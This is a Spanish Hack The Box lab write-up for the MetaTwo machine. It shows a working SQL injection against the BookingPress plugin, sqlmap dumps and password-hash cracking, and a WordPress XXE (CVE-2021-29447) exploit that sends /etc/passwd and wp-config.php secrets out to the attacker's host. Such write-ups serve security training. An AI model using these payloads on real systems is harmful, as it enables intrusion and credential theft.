Table of Contents
Hack The Box: MetaTwo Writeup
Welcome to my detailed writeup of the easy difficulty machine “MetaTwo” on Hack The Box. This writeup will cover the steps taken to achieve initial foothold and escalation to root.
TCP Enumeration
1$ rustscan -a 10.129.228.95 --ulimit 5000 -g
210.129.228.95 -> [21,22,80]
1$ nmap -p21,22,80 -sCV 10.129.228.95 -oN allPorts
2Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-27 14:51 CEST
3Stats: 0:02:51 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
4NSE Timing: About 99.53% done; ETC: 14:54 (0:00:00 remaining)
5Stats: 0:02:52 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
6NSE Timing: About 99.53% done; ETC: 14:54 (0:00:00 remaining)
7Nmap scan report for 10.129.228.95
8Host is up (0.037s latency).
9
10PORT STATE SERVICE VERSION
1121/tcp open ftp?
1222/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
13| ssh-hostkey:
14| 3072 c4:b4:46:17:d2:10:2d:8f:ec:1d:c9:27:fe:cd:79:ee (RSA)
15| 256 2a:ea:2f:cb:23:e8:c5:29:40:9c:ab:86:6d:cd:44:11 (ECDSA)
16|_ 256 fd:78:c0:b0:e2:20:16:fa:05:0d:eb:d8:3f:12:a4:ab (ED25519)
1780/tcp open http nginx 1.18.0
18|_http-title: Did not follow redirect to http://metapress.htb/
19|_http-server-header: nginx/1.18.0
20Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
21
22Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
23Nmap done: 1 IP address (1 host up) scanned in 230.36 seconds
UDP Enumeration
1$ sudo nmap --top-ports 1500 --min-rate 5000 -n -Pn -sU 10.129.228.95 -oN allPorts.UDP
2Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-27 15:01 CEST
3Nmap scan report for 10.129.228.95
4Host is up (0.049s latency).
5Not shown: 1494 open|filtered udp ports (no-response)
6PORT STATE SERVICE
725913/udp closed unknown
826994/udp closed unknown
927025/udp closed unknown
1031720/udp closed unknown
1140539/udp closed unknown
1258178/udp closed unknown
13
14Nmap done: 1 IP address (1 host up) scanned in 0.78 seconds
En el escaneo inicial hemos descubierto el dominio metapress.htb , lo añadimos al /etc/hosts
FTP Enumeration
Por ahora el script ftp-anon de nmap no me ha reportado que podemos conectarnos anónimamente por FTP, así que sin credenciales no podemos hacer mucho.
HTTP Enumeration
1$ whatweb http://metapress.htb
2http://metapress.htb [200 OK] Cookies[PHPSESSID], Country[RESERVED][ZZ], HTML5, HTTPServer[nginx/1.18.0], IP[10.129.228.95], MetaGenerator[WordPress 5.6.2], PHP[8.0.24], PoweredBy[--], Script, Title[MetaPress – Official company site], UncommonHeaders[link], WordPress[5.6.2], X-Powered-By[PHP/8.0.24], nginx[1.18.0]
whatweb nos reporta que estamos en frente de un WordPress 5.6.2
1$ wpscan --url http://metapress.htb -evp,vt,u1-50
2_______________________________________________________________
3 __ _______ _____
4 \ \ / / __ \ / ____|
5 \ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
6 \ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
7 \ /\ / | | ____) | (__| (_| | | | |
8 \/ \/ |_| |_____/ \___|\__,_|_| |_|
9
10 WordPress Security Scanner by the WPScan Team
11 Version 3.8.25
12 Sponsored by Automattic - https://automattic.com/
13 @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
14_______________________________________________________________
15
16^[[A^[[A[+] URL: http://metapress.htb/ [10.129.228.95]
17[+] Started: Tue Aug 27 15:15:24 2024
18
19Interesting Finding(s):
20
21[+] Headers
22 | Interesting Entries:
23 | - Server: nginx/1.18.0
24 | - X-Powered-By: PHP/8.0.24
25 | Found By: Headers (Passive Detection)
26 | Confidence: 100%
27
28[+] robots.txt found: http://metapress.htb/robots.txt
29 | Interesting Entries:
30 | - /wp-admin/
31 | - /wp-admin/admin-ajax.php
32 | Found By: Robots Txt (Aggressive Detection)
33 | Confidence: 100%
34
35[+] XML-RPC seems to be enabled: http://metapress.htb/xmlrpc.php
36 | Found By: Direct Access (Aggressive Detection)
37 | Confidence: 100%
38 | References:
39 | - http://codex.wordpress.org/XML-RPC_Pingback_API
40 | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
41 | - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
42 | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
43 | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
44
45[+] WordPress readme found: http://metapress.htb/readme.html
46 | Found By: Direct Access (Aggressive Detection)
47 | Confidence: 100%
48
49[+] The external WP-Cron seems to be enabled: http://metapress.htb/wp-cron.php
50 | Found By: Direct Access (Aggressive Detection)
51 | Confidence: 60%
52 | References:
53 | - https://www.iplocation.net/defend-wordpress-from-ddos
54 | - https://github.com/wpscanteam/wpscan/issues/1299
55
56[+] WordPress version 5.6.2 identified (Insecure, released on 2021-02-22).
57 | Found By: Rss Generator (Passive Detection)
58 | - http://metapress.htb/feed/, <generator>https://wordpress.org/?v=5.6.2</generator>
59 | - http://metapress.htb/comments/feed/, <generator>https://wordpress.org/?v=5.6.2</generator>
60
61[+] WordPress theme in use: twentytwentyone
62 | Location: http://metapress.htb/wp-content/themes/twentytwentyone/
63 | Last Updated: 2024-07-16T00:00:00.000Z
64 | Readme: http://metapress.htb/wp-content/themes/twentytwentyone/readme.txt
65 | [!] The version is out of date, the latest version is 2.3
66 | Style URL: http://metapress.htb/wp-content/themes/twentytwentyone/style.css?ver=1.1
67 | Style Name: Twenty Twenty-One
68 | Style URI: https://wordpress.org/themes/twentytwentyone/
69 | Description: Twenty Twenty-One is a blank canvas for your ideas and it makes the block editor your best brush. Wi...
70 | Author: the WordPress team
71 | Author URI: https://wordpress.org/
72 |
73 | Found By: Css Style In Homepage (Passive Detection)
74 | Confirmed By: Css Style In 404 Page (Passive Detection)
75 |
76 | Version: 1.1 (80% confidence)
77 | Found By: Style (Passive Detection)
78 | - http://metapress.htb/wp-content/themes/twentytwentyone/style.css?ver=1.1, Match: 'Version: 1.1'
79
80[+] Enumerating Vulnerable Plugins (via Passive Methods)
81
82[i] No plugins Found.
83
84[+] Enumerating Vulnerable Themes (via Passive and Aggressive Methods)
85 Checking Known Locations - Time: 00:00:09 <==========> (652 / 652) 100.00% Time: 00:00:09
86[+] Checking Theme Versions (via Passive and Aggressive Methods)
87
88[i] No themes Found.
89
90[+] Enumerating Users (via Passive and Aggressive Methods)
91 Brute Forcing Author IDs - Time: 00:00:01 <============> (50 / 50) 100.00% Time: 00:00:01
92
93[i] User(s) Identified:
94
95[+] admin
96 | Found By: Author Posts - Author Pattern (Passive Detection)
97 | Confirmed By:
98 | Rss Generator (Passive Detection)
99 | Wp Json Api (Aggressive Detection)
100 | - http://metapress.htb/wp-json/wp/v2/users/?per_page=100&page=1
101 | Rss Generator (Aggressive Detection)
102 | Author Sitemap (Aggressive Detection)
103 | - http://metapress.htb/wp-sitemap-users-1.xml
104 | Author Id Brute Forcing - Author Pattern (Aggressive Detection)
105 | Login Error Messages (Aggressive Detection)
106
107[+] manager
108 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
109 | Confirmed By: Login Error Messages (Aggressive Detection)
110
111[!] No WPScan API Token given, as a result vulnerability data has not been output.
112[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
113
114[+] Finished: Tue Aug 27 15:15:43 2024
115[+] Requests Done: 746
116[+] Cached Requests: 10
117[+] Data Sent: 224.391 KB
118[+] Data Received: 702.891 KB
119[+] Memory used: 269.988 MB
120[+] Elapsed time: 00:00:18
wpscan nos reporta que existen dos usuarios, adminy manager
Así se ve el sitio web.
en /events podemos hacer una “reserva” para acudir a una reunión.
Esto me hizo pensar que debe de estar gestionándolo algún plugin personalizado o no por detrás.
En /wp-content/plugins no tenemos capacidad de directory listing.
Podemos fuzzear utilizando un diccionario de plugins de wordpress pero no encontramos nada.
1$ feroxbuster -u http://metapress.htb -w /opt/SecLists/Discovery/Web-Content/CMS/w
2p-plugins.fuzz.txt -d 1 -t 100
Antes de empezar a probar cosas en la petición para reservar la reunión vamos a buscar vulnerabilidades asociadas a la versión de wordpress ya que es bastante antigua.
Nos encontramos este PoC
Parece que esta versión de WP es vulnerable a CVE-2021-29447, una vulnerabilidad de tipo XML External Entity Injection donde podemos conseguir archivos internos del sistema.
Para poder explotar esto necesitamos saber que se utiliza PHP Versión 8 y necesitamos tener la habilidad de subir archivos.
Si volvemos al whatweb vemos que la siguiente cabecera X-Powered-By[PHP/8.0.24] .
Ahora solo nos falta poder subir un archivo.
SQL Injection -> manager credentials
Analizando el código del formulario vemos lo siguiente.
Parece que el apartado para hacer la reserva lo gestiona un plugin llamado BookingPress
Y parece que es vulnerable a SQL Injection
El campo vulnerable tiene pinta de ser total_service
Vamos a hacer lo que se nos indica para confirmar que es vulnerable.
Necesitamos recuperar un nonce para hacer la petición.
adfcb62f65 es el nonce
Y podemos ver que es vulnerable ya que nos devuelve la versión de la base de datos en uso.
1$ curl -i 'http://metapress.htb/wp-admin/admin-ajax.php' --data 'action=bookingpress_front_get_category_services&_wpnonce=adfcb62f65&category_id=33&total_service=-7502) UNION ALL SELECT @@version,@@version_comment,@@version_compile_os,1,2,3,4,5,6-- -'
2HTTP/1.1 200 OK
3Server: nginx/1.18.0
4Date: Tue, 27 Aug 2024 11:39:51 GMT
5Content-Type: text/html; charset=UTF-8
6Transfer-Encoding: chunked
7Connection: keep-alive
8X-Powered-By: PHP/8.0.24
9X-Robots-Tag: noindex
10X-Content-Type-Options: nosniff
11Expires: Wed, 11 Jan 1984 05:00:00 GMT
12Cache-Control: no-cache, must-revalidate, max-age=0
13X-Frame-Options: SAMEORIGIN
14Referrer-Policy: strict-origin-when-cross-origin
15
16[{"bookingpress_service_id":"10.5.15-MariaDB-0+deb11u1","bookingpress_category_id":"Debian 11","bookingpress_service_name":"debian-linux-gnu","bookingpress_service_price":"$1.00","bookingpress_service_duration_val":"2","bookingpress_service_duration_unit":"3","bookingpress_service_description":"4","bookingpress_service_position":"5","bookingpress_servicedate_created":"6","service_price_without_currency":1,"img_url":"http:\/\/metapress.htb\/wp-content\/plugins\/bookingpress-appointment-booking\/images\/placeholder-img.jpg"}]
Ahora con sqlmap podemos automatizar esta inyección para trabajar mas cómodamente.
1$ sqlmap -u http://metapress.htb/wp-admin/admin-ajax.php --data 'action=bookingpress_front_get_category_services&_wpnonce=adfcb62f65&category_id=33&total_service=-7502*' --level 5 --risk 3 --dbms=MariaDB --batch
2 ___
3 __H__
4 ___ ___[)]_____ ___ ___ {1.8.3#stable}
5|_ -| . [)] | .'| . |
6|___|_ [(]_|_|_|__,| _|
7 |_|V... |_| https://sqlmap.org
8
9[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
10
11[*] starting @ 15:41:03 /2024-08-27/
12
13custom injection marker ('*') found in POST body. Do you want to process it? [Y/n/q] Y
14[15:41:05] [INFO] testing connection to the target URL
15....
16[15:41:21] [INFO] (custom) POST parameter '#1*' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
17[15:41:21] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
18[15:41:21] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
19[15:41:22] [INFO] target URL appears to be UNION injectable with 9 columns
20[15:41:22] [INFO] (custom) POST parameter '#1*' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
21[15:41:22] [WARNING] in OR boolean-based injection cases, please consider usage of switch '--drop-set-cookie' if you experience any problems during data retrieval
22(custom) POST parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
23sqlmap identified the following injection point(s) with a total of 113 HTTP(s) requests:
24---
25Parameter: #1* ((custom) POST)
26 Type: boolean-based blind
27 Title: OR boolean-based blind - WHERE or HAVING clause
28 Payload: action=bookingpress_front_get_category_services&_wpnonce=adfcb62f65&category_id=33&total_service=-9130) OR 5341=5341-- LabT
29
30 Type: time-based blind
31 Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
32 Payload: action=bookingpress_front_get_category_services&_wpnonce=adfcb62f65&category_id=33&total_service=-7502) AND (SELECT 9278 FROM (SELECT(SLEEP(5)))xcAO)-- ZQLG
33
34 Type: UNION query
35 Title: Generic UNION query (NULL) - 9 columns
36 Payload: action=bookingpress_front_get_category_services&_wpnonce=adfcb62f65&category_id=33&total_service=-7502) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7176626b71,0x53485a4262794b64636e414c63736651424446676a53414f446c584f7278746166737a5a51534d6c,0x716b7a7171)-- -
37---
38[15:41:22] [INFO] the back-end DBMS is MySQL
39web application technology: PHP 8.0.24, Nginx 1.18.0
40back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
41[15:41:22] [INFO] fetched data logged to text files under '/home/pointedsec/.local/share/sqlmap/output/metapress.htb'
42[*] ending @ 15:41:22 /2024-08-27/
Podemos ir dumpeando la información
1available databases [2]:
2[*] blog
3[*] information_schema 1Database: blog
2[27 tables]
3+--------------------------------------+
4| wp_bookingpress_appointment_bookings |
5| wp_bookingpress_categories |
6| wp_bookingpress_customers |
7| wp_bookingpress_customers_meta |
8| wp_bookingpress_customize_settings |
9| wp_bookingpress_debug_payment_log |
10| wp_bookingpress_default_daysoff |
11| wp_bookingpress_default_workhours |
12| wp_bookingpress_entries |
13| wp_bookingpress_form_fields |
14| wp_bookingpress_notifications |
15| wp_bookingpress_payment_logs |
16| wp_bookingpress_services |
17| wp_bookingpress_servicesmeta |
18| wp_bookingpress_settings |
19| wp_commentmeta |
20| wp_comments |
21| wp_links |
22| wp_options |
23| wp_postmeta |
24| wp_posts |
25| wp_term_relationships |
26| wp_term_taxonomy |
27| wp_termmeta |
28| wp_terms |
29| wp_usermeta |
30| wp_users |
31+--------------------------------------+Si dumpeamos la información de la tabla wp_users vemos dos hashes de los dos usuarios vistos anteriormente
- admin ->
P$B4aNM28N0E.tMy/JIcnVM - manager ->
$P$B4aNM28N0E.tMy/JIcnVMZbGcU16Q70
Con john podemos crackear uno de estos hashes
1$ john -w=/usr/share/wordlists/rockyou.txt hashes
2Using default input encoding: UTF-8
3Loaded 2 password hashes with 2 different salts (phpass [phpass ($P$ or $H$) 256/256 AVX2 8x3])
4Cost 1 (iteration count) is 8192 for all loaded hashes
5Will run 4 OpenMP threads
6Press 'q' or Ctrl-C to abort, almost any other key for status
7partylikearockstar (?)
Esta es la credencial para el usuario manager.
Ahora podemos iniciar sesión como manager en /wp-admin
CVE-2021-29447 XXE
Y ahora podríamos hacer la explotación para subir este archivo .wav malicioso.
1$ sudo python3 PoC.py -l 10.10.14.125 -p 80 -f /etc/passwd
2
3 ╔═╗╦ ╦╔═╗
4 ║ ╚╗╔╝║╣────2021-29447
5 ╚═╝ ╚╝ ╚═╝
6 Written By (Isa Ebrahim - 0xRar) on January, 2023
7
8 ═══════════════════════════════════════════════════════════════════════════
9 [*] Title: Wordpress XML parsing issue in the Media Library leading to XXE
10 [*] Affected versions: Wordpress 5.6 - 5.7
11 [*] Patched version: Wordpress 5.7.1
12 [*] Installation version: PHP 8
13 ═══════════════════════════════════════════════════════════════════════════
14
15[+] payload.wav was created.
16[+] evil.dtd was created.
17[+] manually upload the payload.wav file to the Media Library.
18[+] wait for the GET request.
19
20[Tue Aug 27 15:48:25 2024] PHP 8.2.20 Development Server (http://0.0.0.0:80) started
Ahora al subir el archivo .wav
1[Tue Aug 27 15:48:46 2024] 10.129.228.95:34156 Accepted
2[Tue Aug 27 15:48:46 2024] 10.129.228.95:34156 [200]: GET /evil.dtd
3[Tue Aug 27 15:48:46 2024] 10.129.228.95:34156 Closing
4[Tue Aug 27 15:48:46 2024] 10.129.228.95:34172 Accepted
5[Tue Aug 27 15:48:46 2024] 10.129.228.95:34172 [404]: GET /?p=jVRNj5swEL3nV3BspUSGkGSDj22lXjaVuum9MuAFusamNiShv74zY8gmgu5WHtB8vHkezxisMS2/8BCWRZX5d1pplgpXLnIha6MBEcEaDNY5yxxAXjWmjTJFpRfovfA1
6LIrPg1zvABTDQo3l8jQL0hmgNny33cYbTiYbSRmai0LUEpm2fBdybxDPjXpHWQssbsejNUeVnYRlmchKycic4FUD8AdYoBDYNcYoppp8lrxSAN/DIpUSvDbBannGuhNYpN6Qe3uS0XUZFhOFKGTc5Hh7ktNYc+kxKUbx1j8mcj6fV7loBY4lRrk6aBuw5m
7YtspcOq4LxgAwmJXh97iCqcnjh4j3KAdpT6SJ4BGdwEFoU0noCgk2zK4t3Ik5QQIc52E4zr03AhRYttnkToXxFK/jUFasn2Rjb4r7H3rWyDj6IvK70x3HnlPnMmbmZ1OTYUn8n/XtwAkjLC5Qt9VzlP0XT0gDDIe29BEe15Sst27OxL5QLH2G45kMk+OYj
8Q+NqoFkul74jA+QNWiudUSdJtGt44ivtk4/Y/yCDz8zB1mnniAfuWZi8fzBX5gTfXDtBu6B7iv6lpXL+DxSGoX8NPiqwNLVkI+j1vzUes62gRv8nSZKEnvGcPyAEN0BnpTW6+iPaChneaFlmrMy7uiGuPT0j12cIBV8ghvd3rlG9+63oDFseRRE/9Mfvj8
9FR2rHPdy3DzGehnMRP+LltfLt2d+0aI9O9wE34hyve2RND7xT7Fw== - No such file or directory
10[Tue Aug 27 15:48:46 2024] 10.129.228.95:34172 Closing
11[Tue Aug 27 15:48:47 2024] 10.129.228.95:34176 Accepted
12[Tue Aug 27 15:48:47 2024] 10.129.228.95:34176 [200]: GET /evil.dtd
13[Tue Aug 27 15:48:47 2024] 10.129.228.95:34176 Closing
14[Tue Aug 27 15:48:47 2024] 10.129.228.95:34192 Accepted
15[Tue Aug 27 15:48:47 2024] 10.129.228.95:34192 [404]: GET /?p=jVRNj5swEL3nV3BspUSGkGSDj22lXjaVuum9MuAFusamNiShv74zY8gmgu5WHtB8vHkezxisMS2/8BCWRZX5d1pplgpXLnIha6MBEcEaDNY5yxxAXjWmjTJFpRfovfA1
16LIrPg1zvABTDQo3l8jQL0hmgNny33cYbTiYbSRmai0LUEpm2fBdybxDPjXpHWQssbsejNUeVnYRlmchKycic4FUD8AdYoBDYNcYoppp8lrxSAN/DIpUSvDbBannGuhNYpN6Qe3uS0XUZFhOFKGTc5Hh7ktNYc+kxKUbx1j8mcj6fV7loBY4lRrk6aBuw5m
17YtspcOq4LxgAwmJXh97iCqcnjh4j3KAdpT6SJ4BGdwEFoU0noCgk2zK4t3Ik5QQIc52E4zr03AhRYttnkToXxFK/jUFasn2Rjb4r7H3rWyDj6IvK70x3HnlPnMmbmZ1OTYUn8n/XtwAkjLC5Qt9VzlP0XT0gDDIe29BEe15Sst27OxL5QLH2G45kMk+OYj
18Q+NqoFkul74jA+QNWiudUSdJtGt44ivtk4/Y/yCDz8zB1mnniAfuWZi8fzBX5gTfXDtBu6B7iv6lpXL+DxSGoX8NPiqwNLVkI+j1vzUes62gRv8nSZKEnvGcPyAEN0BnpTW6+iPaChneaFlmrMy7uiGuPT0j12cIBV8ghvd3rlG9+63oDFseRRE/9Mfvj8
19FR2rHPdy3DzGehnMRP+LltfLt2d+0aI9O9wE34hyve2RND7xT7Fw== - No such file or directory
20[Tue Aug 27 15:48:47 2024] 10.129.228.95:34192 Closing
Ahora si modificamos el archivo decode.php
1<?php
2echo zlib_decode(base64_decode('jVRNj5swEL3nV3BspUSGkGSDj22lXjaVuum9MuAFusamNiShv74zY8gmgu5WHtB8vHkezxisMS2/8BCWRZX5d1pplgpXLnIha6MBEcEaDNY5yxxAXjWmjTJFpRfovfA1
3LIrPg1zvABTDQo3l8jQL0hmgNny33cYbTiYbSRmai0LUEpm2fBdybxDPjXpHWQssbsejNUeVnYRlmchKycic4FUD8AdYoBDYNcYoppp8lrxSAN/DIpUSvDbBannGuhNYpN6Qe3uS0XUZFhOFKGTc5Hh7ktNYc+kxKUbx1j8mcj6fV7loBY4lRrk6aBuw5m
4YtspcOq4LxgAwmJXh97iCqcnjh4j3KAdpT6SJ4BGdwEFoU0noCgk2zK4t3Ik5QQIc52E4zr03AhRYttnkToXxFK/jUFasn2Rjb4r7H3rWyDj6IvK70x3HnlPnMmbmZ1OTYUn8n/XtwAkjLC5Qt9VzlP0XT0gDDIe29BEe15Sst27OxL5QLH2G45kMk+OYj
5Q+NqoFkul74jA+QNWiudUSdJtGt44ivtk4/Y/yCDz8zB1mnniAfuWZi8fzBX5gTfXDtBu6B7iv6lpXL+DxSGoX8NPiqwNLVkI+j1vzUes62gRv8nSZKEnvGcPyAEN0BnpTW6+iPaChneaFlmrMy7uiGuPT0j12cIBV8ghvd3rlG9+63oDFseRRE/9Mfvj8
6FR2rHPdy3DzGehnMRP+LltfLt2d+0aI9O9wE34hyve2RND7xT7Fw=='));
7?>
1$ php decode.php
2root:x:0:0:root:/root:/bin/bash
3daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
4bin:x:2:2:bin:/bin:/usr/sbin/nologin
5sys:x:3:3:sys:/dev:/usr/sbin/nologin
6sync:x:4:65534:sync:/bin:/bin/sync
7games:x:5:60:games:/usr/games:/usr/sbin/nologin
8man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
9lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
10mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
11...............................
12sshd:x:104:65534::/run/sshd:/usr/sbin/nologin
13jnelson:x:1000:1000:jnelson,,,:/home/jnelson:/bin/bash
14systemd-timesync:x:999:999:systemd Time Synchronization:/:/usr/sbin/nologin
15systemd-coredump:x:998:998:systemd Core Dumper:/:/usr/sbin/nologin
16mysql:x:105:111:MySQL Server,,,:/nonexistent:/bin/false
17proftpd:x:106:65534::/run/proftpd:/usr/sbin/nologin
18ftp:x:107:65534::/srv/ftp:/usr/sbin/nologin
Del /etc/hosts me interesa que existe un usuario a nivel de sistema llamado jnelson y que el servicio FTP se encuentra alojado en el directorio /srv/ftp por lo cual quizás se alojen archivos de configuración allí.
Podemos intentar iniciar sesión con el usuario jnelson a través del SSH
1$ ssh jnelson@metapress.htb
2The authenticity of host 'metapress.htb (10.129.228.95)' can't be established.
3ED25519 key fingerprint is SHA256:0PexEedxcuaYF8COLPS2yzCpWaxg8+gsT1BRIpx/OSY.
4This key is not known by any other names.
5Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
6Warning: Permanently added 'metapress.htb' (ED25519) to the list of known hosts.
7jnelson@metapress.htb's password:
8Permission denied, please try again.
Pero no funciona.
Probando a recuperar los archivos /srv/ftp/vsftpd.conf y /etc/vsftpd.conf no conseguimos nada.
1[Tue Aug 27 15:55:08 2024] 10.129.228.95:49608 Accepted
2[Tue Aug 27 15:55:08 2024] 10.129.228.95:49608 [200]: GET /evil.dtd
3[Tue Aug 27 15:55:08 2024] 10.129.228.95:49608 Closing
4[Tue Aug 27 15:55:09 2024] 10.129.228.95:49618 Accepted
5[Tue Aug 27 15:55:09 2024] 10.129.228.95:49618 [200]: GET /evil.dtd
6[Tue Aug 27 15:55:09 2024] 10.129.228.95:49618 Closing
Vamos a conseguir el archivo de configuración de WordPress para conseguir las credenciales de base de datos y comprobar si se reutilizan para el usuario jnelson
1$ sudo python3 PoC.py -l 10.10.14.125 -p 80 -f ../wp-config.php
2
3 ╔═╗╦ ╦╔═╗
4 ║ ╚╗╔╝║╣────2021-29447
5 ╚═╝ ╚╝ ╚═╝
6 Written By (Isa Ebrahim - 0xRar) on January, 2023
7
8 ═══════════════════════════════════════════════════════════════════════════
9 [*] Title: Wordpress XML parsing issue in the Media Library leading to XXE
10 [*] Affected versions: Wordpress 5.6 - 5.7
11 [*] Patched version: Wordpress 5.7.1
12 [*] Installation version: PHP 8
13 ═══════════════════════════════════════════════════════════════════════════
14
15[+] payload.wav was created.
16[+] evil.dtd was created.
17[+] manually upload the payload.wav file to the Media Library.
18[+] wait for the GET request.
19
20[Tue Aug 27 16:00:38 2024] PHP 8.2.20 Development Server (http://0.0.0.0:80) started
21^[[A^[[B[Tue Aug 27 16:00:44 2024] 10.129.228.95:37876 Accepted
22[Tue Aug 27 16:00:44 2024] 10.129.228.95:37876 [200]: GET /evil.dtd
23[Tue Aug 27 16:00:44 2024] 10.129.228.95:37876 Closing
24[Tue Aug 27 16:00:44 2024] 10.129.228.95:37892 Accepted
25[Tue Aug 27 16:00:44 2024] 10.129.228.95:37892 [404]: GET /?p=jVVZU/JKEH2+VvkfhhKMoARUQBARAoRNIEDCpgUhIRMSzEYyYVP87TdBBD71LvAANdNzTs/p6dMPaUMyTk9CgQBgJAg0ToVAFwFy/gsc4njOgkDUTdDVTaFhQssCgdDpiQBFWYMXAMtn2TpRI7ErgPGKPsGAP3l68glXW9HN6gHEtqC5Rf9+vk2Trf9x3uAsa+Ek8eN8g6DpLtXKuxix2ygxyzDCzMwteoX28088SbfQr2mUKJpxIRR9zClu1PHZ/FcWOYkzLYgA0t0LAVkDYxNySNYmh0ydHwVa+A+GXIlo0eSWxEZiXOUjxxSu+gcaXVE45ECtDIiDvK5hCIwlTps4S5JsAVl0qQXd5tEvPFS1SjDbmnwR7LcLNFsjmRK1VUtEBlzu7nmIYBr7kqgQcYZbdFxC/C9xrvRuXKLep1lZzhRWVdaI1m7q88ov0V8KO7T4fyFnCXr/qEK/7NN01dkWOcURa6/hWeby9AQEAGE7z1dD8tgpjK6BtibPbAie4MoCnCYAmlOQhW8jM5asjSG4wWN42F04VpJoMyX2iew7PF8fLO159tpFKkDElhQZXV4ZC9iIyIF1Uh2948/3vYy/2WoWeq+51kq524zMXqeYugXa4+WtmsazoftvN6HJXLtFssdM2NIre/18eMBfj20jGbkb9Ts2F6qUZr5AvE3EJoMwv9DJ7n3imnxOSAOzq3RmvnIzFjPEt9SA832jqFLFIplny/XDVbDKpbrMcY3I+mGCxxpDNFrL80dB2JCk7IvEfRWtNRve1KYFWUba2bl2WerNB+/v5GXhI/c2e+qtvlHUqXqO/FMpjFZh3vR6qfBUTg4Tg8Doo1iHHqOXyc+7fERNkEIqL1zgZnD2NlxfFNL+O3VZb08S8RhqUndU9BvFViGaqDJHFC9JJjsZh65qZ34hKr6UAmgSDcsik36e49HuMjVSMnNvcF4KPHzchwfWRng4ryXxq2V4/dF6vPXk/6UWOybscdQhrJinmIhGhYqV9lKRtTrCm0lOnXaHdsV8Za+DQvmCnrYooftCn3/oqlwaTju59E2wnC7j/1iL/VWwyItID289KV+6VNaNmvE66fP6Kh6cKkN5UFts+kD4qKfOhxWrPKr5CxWmQnbKflA/q1OyUBZTv9biD6Uw3Gqf55qZckuRAJWMcpbSvyzM4s2uBOn6Uoh14Nlm4cnOrqRNJzF9ol+ZojX39SPR60K8muKrRy61bZrDKNj7FeNaHnAaWpSX+K6RvFsfZD8XQQpgC4PF/gAqOHNFgHOo6AY0rfsjYAHy9mTiuqqqC3DXq4qsvQIJIcO6D4XcUfBpILo5CVm2YegmCnGm0/UKDO3PB2UtuA8NfW/xboPNk9l28aeVAIK3dMVG7txBkmv37kQ8SlA24Rjp5urTfh0/vgAe8AksuA82SzcIpuRI53zfTk/+Ojzl3c4VYNl8ucWyAAfYzuI2X+w0RBawjSPCuTN3tu7lGJZiC1AAoryfMiac2U5CrO6a2Y7AhV0YQWdYudPJwp0x76r/Nw== - No such file or directory
Después de probar un rato intentando acertar rutas absolutas, probé una ruta relativa ../wp-config.php y funcionó.
Ahora si reemplazamos el base64 de decode.php
1$ php decode.php
2<?php
3/** The name of the database for WordPress */
4define( 'DB_NAME', 'blog' );
5
6/** MySQL database username */
7define( 'DB_USER', 'blog' );
8
9/** MySQL database password */
10define( 'DB_PASSWORD', '635Aq@TdqrCwXFUZ' );
11
12/** MySQL hostname */
13define( 'DB_HOST', 'localhost' );
14
15/** Database Charset to use in creating database tables. */
16define( 'DB_CHARSET', 'utf8mb4' );
17
18/** The Database Collate type. Don't change this if in doubt. */
19define( 'DB_COLLATE', '' );
20
21define( 'FS_METHOD', 'ftpext' );
22define( 'FTP_USER', 'metapress.htb' );
23define( 'FTP_PASS', '9NYS_ii@FyL_p5M2NvJ' );
24define( 'FTP_HOST', 'ftp.metapress.htb' );
25define( 'FTP_BASE', 'blog/' );
26define( 'FTP_SSL', false );
27
28/**#@+
29 * Authentication Unique Keys and Salts.
30 * @since 2.6.0
31 */
32define( 'AUTH_KEY', '?!Z$uGO*A6xOE5x,pweP4i*z;m`|.Z:X@)QRQFXkCRyl7}`rXVG=3 n>+3m?.B/:' );
33define( 'SECURE_AUTH_KEY', 'x$i$)b0]b1cup;47`YVua/JHq%*8UA6g]0bwoEW:91EZ9h]rWlVq%IQ66pf{=]a%' );
34define( 'LOGGED_IN_KEY', 'J+mxCaP4z<g.6P^t`ziv>dd}EEi%48%JnRq^2MjFiitn#&n+HXv]||E+F~C{qKXy' );
35define( 'NONCE_KEY', 'SmeDr$$O0ji;^9]*`~GNe!pX@DvWb4m9Ed=Dd(.r-q{^z(F?)7mxNUg986tQO7O5' );
36define( 'AUTH_SALT', '[;TBgc/,M#)d5f[H*tg50ifT?Zv.5Wx=`l@v$-vH*<~:0]s}d<&M;.,x0z~R>3!D' );
37define( 'SECURE_AUTH_SALT', '>`VAs6!G955dJs?$O4zm`.Q;amjW^uJrk_1-dI(SjROdW[S&~omiH^jVC?2-I?I.' );
38define( 'LOGGED_IN_SALT', '4[fS^3!=%?HIopMpkgYboy8-jl^i]Mw}Y d~N=&^JsI`M)FJTJEVI) N#NOidIf=' );
